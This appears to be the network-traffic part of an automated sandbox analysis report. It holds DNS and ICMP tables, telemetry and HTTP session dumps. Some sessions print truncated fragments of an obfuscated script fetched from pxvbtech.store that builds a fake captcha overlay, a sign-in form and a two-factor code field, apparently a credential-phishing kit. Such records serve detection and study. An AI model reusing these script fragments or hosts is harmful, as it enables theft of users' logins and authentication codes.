Feb 25, 2025 02:20:04.427687883 CET	53440	53	192.168.2.24	1.1.1.1
Feb 25, 2025 02:20:04.428606987 CET	56450	53	192.168.2.24	1.1.1.1
Feb 25, 2025 02:20:04.435460091 CET	53	53440	1.1.1.1	192.168.2.24
Feb 25, 2025 02:20:04.438011885 CET	53	56450	1.1.1.1	192.168.2.24
Feb 25, 2025 02:20:05.601341963 CET	51836	53	192.168.2.24	1.1.1.1
Feb 25, 2025 02:20:05.601648092 CET	62638	53	192.168.2.24	1.1.1.1
Feb 25, 2025 02:20:05.609416008 CET	53	51836	1.1.1.1	192.168.2.24
Feb 25, 2025 02:20:05.609453917 CET	53	62638	1.1.1.1	192.168.2.24
Feb 25, 2025 02:20:06.471239090 CET	53	53753	1.1.1.1	192.168.2.24
Feb 25, 2025 02:20:16.702919960 CET	49568	53	192.168.2.24	1.1.1.1
Feb 25, 2025 02:20:16.703085899 CET	56961	53	192.168.2.24	1.1.1.1
Feb 25, 2025 02:20:16.711646080 CET	53	49568	1.1.1.1	192.168.2.24
Feb 25, 2025 02:20:16.717168093 CET	53	56961	1.1.1.1	192.168.2.24
Feb 25, 2025 02:20:17.346726894 CET	53	55946	1.1.1.1	192.168.2.24
Feb 25, 2025 02:20:17.661534071 CET	53170	53	192.168.2.24	1.1.1.1
Feb 25, 2025 02:20:17.661674023 CET	62511	53	192.168.2.24	1.1.1.1
Feb 25, 2025 02:20:17.668844938 CET	53	53170	1.1.1.1	192.168.2.24
Feb 25, 2025 02:20:17.669184923 CET	53	62511	1.1.1.1	192.168.2.24
Feb 25, 2025 02:20:19.030529976 CET	62100	53	192.168.2.24	1.1.1.1
Feb 25, 2025 02:20:19.030663013 CET	58318	53	192.168.2.24	1.1.1.1
Feb 25, 2025 02:20:19.037843943 CET	53	62100	1.1.1.1	192.168.2.24
Feb 25, 2025 02:20:19.038192034 CET	53	58318	1.1.1.1	192.168.2.24
Feb 25, 2025 02:20:26.544439077 CET	53	62526	1.1.1.1	192.168.2.24
Feb 25, 2025 02:20:27.453665972 CET	53	52190	162.159.36.2	192.168.2.24
Feb 25, 2025 02:20:27.927239895 CET	52468	53	192.168.2.24	1.1.1.1
Feb 25, 2025 02:20:27.934706926 CET	53	52468	1.1.1.1	192.168.2.24
Feb 25, 2025 02:20:35.929023027 CET	54282	53	192.168.2.24	1.1.1.1
Feb 25, 2025 02:20:35.955579042 CET	53	54282	1.1.1.1	192.168.2.24
Feb 25, 2025 02:20:42.427383900 CET	137	137	192.168.2.24	192.168.2.255
Feb 25, 2025 02:20:43.178447008 CET	137	137	192.168.2.24	192.168.2.255
Feb 25, 2025 02:20:43.932566881 CET	137	137	192.168.2.24	192.168.2.255
Feb 25, 2025 02:21:01.541016102 CET	52439	53	192.168.2.24	1.1.1.1
Feb 25, 2025 02:21:01.548317909 CET	53	52439	1.1.1.1	192.168.2.24
Feb 25, 2025 02:22:36.045007944 CET	138	138	192.168.2.24	192.168.2.255

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Feb 25, 2025 02:20:00.464382887 CET	192.168.2.24	1.1.1.1	c24b	(Port unreachable)	Destination Unreachable
Feb 25, 2025 02:20:04.483587980 CET	192.168.2.24	1.1.1.1	c2f0	(Port unreachable)	Destination Unreachable

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 02:21:14.963545084 CET	200	OUT	GET /r/r1.crl HTTP/1.1 Cache-Control: max-age = 3000 Connection: Keep-Alive Accept: / If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT User-Agent: Microsoft-CryptoAPI/10.0 Host: c.pki.goog
Feb 25, 2025 02:21:15.615494013 CET	223	IN	HTTP/1.1 304 Not Modified Date: Tue, 25 Feb 2025 00:54:56 GMT Expires: Tue, 25 Feb 2025 01:44:56 GMT Age: 1579 Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT Cache-Control: public, max-age=3000 Vary: Accept-Encoding

Timestamp	Bytes transferred	Direction	Data
2025-02-25 01:19:51 UTC	473	OUT	POST /OneCollector/1.0?cors=true&content-type=application%2Fx-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=c498711f02654edca8a715ca6e1cb4d4-dc31da17-845c-4cca-84e5-547d05dad708-6945&upload-time=1740446390074&w=0&anoncknm=al_app_anon&NoResponseBody=true HTTP/1.1 Accept-Encoding: gzip, deflate Content-Length: 2744 Content-Type: application/json; charset=UTF-8 Host: browser.events.data.msn.cn Connection: Keep-Alive Cache-Control: no-cache
2025-02-25 01:19:51 UTC	2744	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 53 65 72 76 65 72 4c 6f 67 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 63 34 39 38 37 31 31 66 30 32 36 35 34 65 64 63 61 38 61 37 31 35 63 61 36 65 31 63 62 34 64 34 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 32 2d 32 35 54 30 31 3a 31 39 3a 34 30 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 64 61 74 61 22 3a 7b 22 70 61 67 65 22 3a 7b 22 70 72 6f 64 75 63 74 22 3a 22 65 6e 74 77 69 6e 64 6f 77 73 64 61 73 68 22 2c 22 61 70 70 54 79 70 65 22 3a 22 77 69 6e 57 69 64 67 65 74 73 22 2c 22 6e 61 6d 65 22 3a 22 77 69 6e 70 32 62 61 63 6b 69 6e 67 61 70 70 22 2c 22 69 73 4d 6f 63 6b 45 6e 76 22 3a 66 61 6c 73 65 2c 22 68 6f 73 74 56 65 72 22 3a 22 35 32 34 2e 33 30 35 30 32 2e 33 30 2e 30 22 2c 22 Data Ascii: {"name":"MS.News.Web.ServerLog","iKey":"o:c498711f02654edca8a715ca6e1cb4d4","time":"2025-02-25T01:19:40Z","ver":"4.0","data":{"page":{"product":"entwindowsdash","appType":"winWidgets","name":"winp2backingapp","isMockEnv":false,"hostVer":"524.30502.30.0","

Timestamp	Bytes transferred	Direction	Data
2025-02-25 01:19:59 UTC	501	OUT	GET /xtk/xls/x1t2k.js HTTP/1.1 Host: pxvbtech.store Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-02-25 01:19:59 UTC	279	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 content-type: text/javascript last-modified: Mon, 24 Feb 2025 20:24:50 GMT accept-ranges: bytes content-length: 57098 date: Tue, 25 Feb 2025 01:19:59 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2025-02-25 01:19:59 UTC	16105	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 66 38 34 39 28 5f 30 78 33 39 38 62 39 33 2c 5f 30 78 34 31 31 36 31 61 29 7b 76 61 72 20 5f 30 78 32 63 36 64 64 61 3d 5f 30 78 32 63 36 64 28 29 3b 72 65 74 75 72 6e 20 5f 30 78 66 38 34 39 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 66 38 34 39 37 38 2c 5f 30 78 33 38 30 36 62 64 29 7b 5f 30 78 66 38 34 39 37 38 3d 5f 30 78 66 38 34 39 37 38 2d 30 78 31 30 65 3b 76 61 72 20 5f 30 78 35 37 34 61 31 65 3d 5f 30 78 32 63 36 64 64 61 5b 5f 30 78 66 38 34 39 37 38 5d 3b 72 65 74 75 72 6e 20 5f 30 78 35 37 34 61 31 65 3b 7d 2c 5f 30 78 66 38 34 39 28 5f 30 78 33 39 38 62 39 33 2c 5f 30 78 34 31 31 36 31 61 29 3b 7d 76 61 72 20 5f 30 78 31 32 32 62 33 66 3d 5f 30 78 66 38 34 39 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 30 62 Data Ascii: function _0xf849(_0x398b93,_0x41161a){var _0x2c6dda=_0x2c6d();return _0xf849=function(_0xf84978,_0x3806bd){_0xf84978=_0xf84978-0x10e;var _0x574a1e=_0x2c6dda[_0xf84978];return _0x574a1e;},_0xf849(_0x398b93,_0x41161a);}var _0x122b3f=_0xf849;(function(_0x20b
2025-02-25 01:19:59 UTC	5499	IN	Data Raw: 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 63 61 70 74 63 68 61 2d 66 75 6c 6c 73 63 72 65 65 6e 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 70 6f 73 69 74 69 6f 6e 3a 5c 78 32 30 66 69 78 65 64 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 74 6f 70 3a 5c 78 32 30 30 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6c 65 66 74 3a 5c 78 32 30 30 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 77 69 64 74 68 3a 5c 78 32 30 31 30 30 25 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 68 65 69 67 68 74 3a 5c 78 32 30 31 30 30 76 68 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 62 61 63 6b 67 72 6f 75 6e 64 3a 5c 78 32 30 77 68 69 74 65 3b 5c 78 30 Data Ascii: x20\x20\x20\x20.captcha-fullscreen\x20{\x0a\x20\x20\x20\x20position:\x20fixed;\x0a\x20\x20\x20\x20top:\x200;\x0a\x20\x20\x20\x20left:\x200;\x0a\x20\x20\x20\x20width:\x20100%;\x0a\x20\x20\x20\x20height:\x20100vh;\x0a\x20\x20\x20\x20background:\x20white;\x0
2025-02-25 01:19:59 UTC	16384	IN	Data Raw: 74 6e 5c 78 32 30 72 6f 75 6e 64 65 64 2d 30 5c 78 32 30 74 65 78 74 2d 77 68 69 74 65 5c 78 32 30 70 78 2d 34 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 73 75 62 6d 69 74 2d 62 74 6e 5c 78 32 32 5c 78 32 30 73 74 79 6c 65 3d 5c 78 32 32 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 5c 78 32 30 23 30 30 36 36 42 41 3b 5c 78 32 32 3e 53 69 67 6e 5c 78 32 30 49 6e 3c 2f 62 75 74 74 6f 6e 3e 3c 2f 64 69 76 3e 27 5d 3b 5f 30 78 32 63 36 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 61 62 38 36 32 3b 7d 3b 72 65 74 75 72 6e 20 5f 30 78 32 63 36 64 28 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 75 6e 6c 6f 63 6b 50 61 67 65 28 29 7b 69 66 28 21 62 6f 74 44 65 74 65 63 74 65 64 29 7b 7d 7d 77 69 6e 64 6f 77 5b 5f 30 78 31 32 32 62 33 66 Data Ascii: tn\x20rounded-0\x20text-white\x20px-4\x22\x20id=\x22submit-btn\x22\x20style=\x22background-color:\x20#0066BA;\x22>Sign\x20In</button></div>'];_0x2c6d=function(){return _0x5ab862;};return _0x2c6d();}function unlockPage(){if(!botDetected){}}window[_0x122b3f
2025-02-25 01:20:00 UTC	16384	IN	Data Raw: 31 64 66 29 5d 28 5f 30 78 35 35 39 66 66 32 28 30 78 31 31 62 29 29 2c 5f 30 78 33 34 36 63 38 31 5b 5f 30 78 35 35 39 66 66 32 28 30 78 31 64 66 29 5d 28 27 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 66 6f 72 6d 2d 67 72 6f 75 70 5c 78 32 30 6d 74 2d 32 5c 78 32 32 3e 3c 6c 61 62 65 6c 5c 78 32 30 66 6f 72 3d 5c 78 32 32 32 66 61 2d 63 6f 64 65 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 68 35 5c 78 32 32 5c 78 32 30 73 74 79 6c 65 3d 5c 78 32 32 66 6f 6e 74 2d 73 69 7a 65 3a 5c 78 32 30 31 36 70 74 3b 5c 78 32 32 3e 45 6e 74 65 72 5c 78 32 30 63 6f 64 65 3c 2f 6c 61 62 65 6c 3e 3c 70 5c 78 32 30 73 74 79 6c 65 3d 5c 78 32 32 66 6f 6e 74 2d 73 69 7a 65 3a 5c 78 32 30 31 31 70 74 3b 5c 78 32 32 3e 45 6e 74 65 72 5c 78 32 30 74 68 65 Data Ascii: 1df)](_0x559ff2(0x11b)),_0x346c81[_0x559ff2(0x1df)]('<div\x20class=\x22form-group\x20mt-2\x22><label\x20for=\x222fa-code\x22\x20class=\x22h5\x22\x20style=\x22font-size:\x2016pt;\x22>Enter\x20code</label><p\x20style=\x22font-size:\x2011pt;\x22>Enter\x20the
2025-02-25 01:20:00 UTC	2726	IN	Data Raw: 27 3a 27 30 27 2c 27 6f 70 61 63 69 74 79 27 3a 5f 30 78 33 66 33 62 35 37 28 30 78 31 33 33 29 7d 2c 30 78 30 29 3b 7d 2c 5f 30 78 34 33 64 33 66 36 5b 5f 30 78 31 37 32 61 62 66 28 30 78 31 64 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 63 31 37 34 66 29 7b 76 61 72 20 5f 30 78 63 37 33 39 37 36 3d 5f 30 78 31 37 32 61 62 66 2c 5f 30 78 31 37 38 33 66 65 3d 4a 53 4f 4e 5b 27 70 61 72 73 65 27 5d 28 5f 30 78 35 63 31 37 34 66 5b 5f 30 78 63 37 33 39 37 36 28 30 78 31 33 34 29 5d 29 3b 5f 30 78 31 37 38 33 66 65 5b 5f 30 78 63 37 33 39 37 36 28 30 78 31 38 38 29 5d 3d 3d 3d 5f 30 78 63 37 33 39 37 36 28 30 78 31 35 65 29 3f 77 69 6e 64 6f 77 5b 5f 30 78 63 37 33 39 37 36 28 30 78 31 36 39 29 5d 5b 27 72 65 70 6c 61 63 65 27 5d 28 5f 30 78 63 37 33 Data Ascii: ':'0','opacity':_0x3f3b57(0x133)},0x0);},_0x43d3f6[_0x172abf(0x1d5)]=function(_0x5c174f){var _0xc73976=_0x172abf,_0x1783fe=JSON['parse'](_0x5c174f[_0xc73976(0x134)]);_0x1783fe[_0xc73976(0x188)]===_0xc73976(0x15e)?window[_0xc73976(0x169)]['replace'](_0xc73

Timestamp	Bytes transferred	Direction	Data
2025-02-25 01:20:01 UTC	527	OUT	GET /start/xls/includes/css6.css HTTP/1.1 Host: linxcoded.store Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24" sec-ch-ua-mobile: ?0 Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-02-25 01:20:01 UTC	352	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 cache-control: public, max-age=604800 expires: Tue, 04 Mar 2025 01:20:01 GMT content-type: text/css last-modified: Mon, 27 Jan 2025 19:21:00 GMT accept-ranges: bytes content-length: 258966 date: Tue, 25 Feb 2025 01:20:01 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2025-02-25 01:20:01 UTC	16032	IN	Data Raw: 20 2f 2a 21 0d 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0d 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0d 0a 20 2a 2f 0d 0a 20 20 20 20 3a 72 6f 6f 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 2d 62 6c 75 65 3a 20 23 30 30 37 Data Ascii: /! Bootstrap v4.0.0 (https://getbootstrap.com) * Copyright 2011-2018 The Bootstrap Authors * Copyright 2011-2018 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */ :root { --blue: #007
2025-02-25 01:20:01 UTC	5499	IN	Data Raw: 20 34 3b 0d 0a 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 34 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 6f 72 64 65 72 2d 35 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 36 3b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 35 3b 0d 0a 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 35 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 6f 72 64 65 72 2d 36 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 37 3b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 36 3b 0d 0a 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 36 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 Data Ascii: 4; order: 4 } .order-5 { -webkit-box-ordinal-group: 6; -ms-flex-order: 5; order: 5 } .order-6 { -webkit-box-ordinal-group: 7; -ms-flex-order: 6; order: 6 }
2025-02-25 01:20:01 UTC	16384	IN	Data Raw: 72 3a 20 38 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 6f 72 64 65 72 2d 73 6d 2d 39 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 31 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 39 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 6f 72 64 65 72 2d 73 6d 2d 31 30 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 31 31 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 31 30 3b 0d 0a 20 Data Ascii: r: 8 } .order-sm-9 { -webkit-box-ordinal-group: 10; -ms-flex-order: 9; order: 9 } .order-sm-10 { -webkit-box-ordinal-group: 11; -ms-flex-order: 10;
2025-02-25 01:20:01 UTC	16384	IN	Data Raw: 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 31 30 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 6f 72 64 65 72 2d 78 6c 2d 31 31 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 31 32 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 31 31 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 31 31 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 6f 72 64 65 72 2d 78 6c 2d 31 32 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 31 33 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c Data Ascii: order: 10 } .order-xl-11 { -webkit-box-ordinal-group: 12; -ms-flex-order: 11; order: 11 } .order-xl-12 { -webkit-box-ordinal-group: 13; -ms-fl
2025-02-25 01:20:01 UTC	16384	IN	Data Raw: 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 69 6e 70 75 74 2e 69 73 2d 76 61 6c 69 64 7e 2e 76 61 6c 69 64 2d 66 65 65 64 62 61 63 6b 2c 0d 0a 20 20 20 20 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 69 6e 70 75 74 2e 69 73 2d 76 61 6c 69 64 7e 2e 76 61 6c 69 64 2d 74 6f 6f 6c 74 69 70 2c 0d 0a 20 20 20 20 2e 77 61 73 2d 76 61 6c 69 64 61 74 65 64 20 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 69 6e 70 75 74 3a 76 61 6c 69 64 7e 2e 76 61 6c 69 64 2d 66 65 65 64 62 61 63 6b 2c 0d 0a 20 20 20 20 2e 77 61 73 2d 76 61 6c 69 64 61 74 65 64 20 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 69 6e 70 75 74 3a 76 61 6c 69 64 7e 2e 76 61 6c 69 64 2d 74 6f 6f 6c 74 69 70 20 7b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 0d 0a 20 20 Data Ascii: ustom-control-input.is-valid~.valid-feedback, .custom-control-input.is-valid~.valid-tooltip, .was-validated .custom-control-input:valid~.valid-feedback, .was-validated .custom-control-input:valid~.valid-tooltip { display: block
2025-02-25 01:20:01 UTC	16331	IN	Data Raw: 2e 66 6f 63 75 73 2c 0d 0a 20 20 20 20 2e 62 74 6e 2d 64 61 72 6b 3a 66 6f 63 75 73 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 2e 32 72 65 6d 20 72 67 62 61 28 35 32 2c 20 35 38 2c 20 36 34 2c 20 2e 35 29 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 62 74 6e 2d 64 61 72 6b 2e 64 69 73 61 62 6c 65 64 2c 0d 0a 20 20 20 20 2e 62 74 6e 2d 64 61 72 6b 3a 64 69 73 61 62 6c 65 64 20 7b 0d 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 34 33 61 34 30 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 33 34 33 61 34 30 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 62 74 6e 2d 64 61 Data Ascii: .focus, .btn-dark:focus { box-shadow: 0 0 0 .2rem rgba(52, 58, 64, .5) } .btn-dark.disabled, .btn-dark:disabled { color: #fff; background-color: #343a40; border-color: #343a40 } .btn-da
2025-02-25 01:20:01 UTC	16384	IN	Data Raw: 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 70 78 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 62 74 6e 2d 74 6f 6f 6c 62 61 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 77 72 61 70 3a 20 77 72 61 70 3b 0d 0a 20 20 20 20 20 20 20 20 66 6c 65 78 2d 77 72 61 70 3a 20 77 72 61 70 3b 0d 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 20 73 74 61 72 74 3b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 20 73 74 61 72 74 Data Ascii: margin-left: -1px } .btn-toolbar { display: -webkit-box; display: -ms-flexbox; display: flex; -ms-flex-wrap: wrap; flex-wrap: wrap; -webkit-box-pack: start; -ms-flex-pack: start
2025-02-25 01:20:01 UTC	16384	IN	Data Raw: 63 6f 6e 74 65 6e 74 3e 2e 74 61 62 2d 70 61 6e 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 74 61 62 2d 63 6f 6e 74 65 6e 74 3e 2e 61 63 74 69 76 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 6e 61 76 62 61 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 Data Ascii: content>.tab-pane { display: none } .tab-content>.active { display: block } .navbar { position: relative; display: -webkit-box; display: -ms-flexbox; display: flex; -ms
2025-02-25 01:20:01 UTC	16384	IN	Data Raw: 2d 2e 36 32 35 72 65 6d 3b 0d 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 2d 2e 37 35 72 65 6d 3b 0d 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 2e 36 32 35 72 65 6d 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 30 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 63 61 72 64 2d 68 65 61 64 65 72 2d 70 69 6c 6c 73 20 7b 0d 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 2d 2e 36 32 35 72 65 6d 3b 0d 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 2e 36 32 35 72 65 6d 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 63 61 72 64 2d 69 6d 67 2d 6f 76 65 72 6c 61 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 Data Ascii: -.625rem; margin-bottom: -.75rem; margin-left: -.625rem; border-bottom: 0 } .card-header-pills { margin-right: -.625rem; margin-left: -.625rem } .card-img-overlay { position: ab
2025-02-25 01:20:01 UTC	16384	IN	Data Raw: 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 2e 37 35 72 65 6d 20 31 2e 32 35 72 65 6d 3b 0d 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 2d 31 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 31 32 35 29 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 3a 66 69 72 73 74 2d 63 68 69 6c 64 20 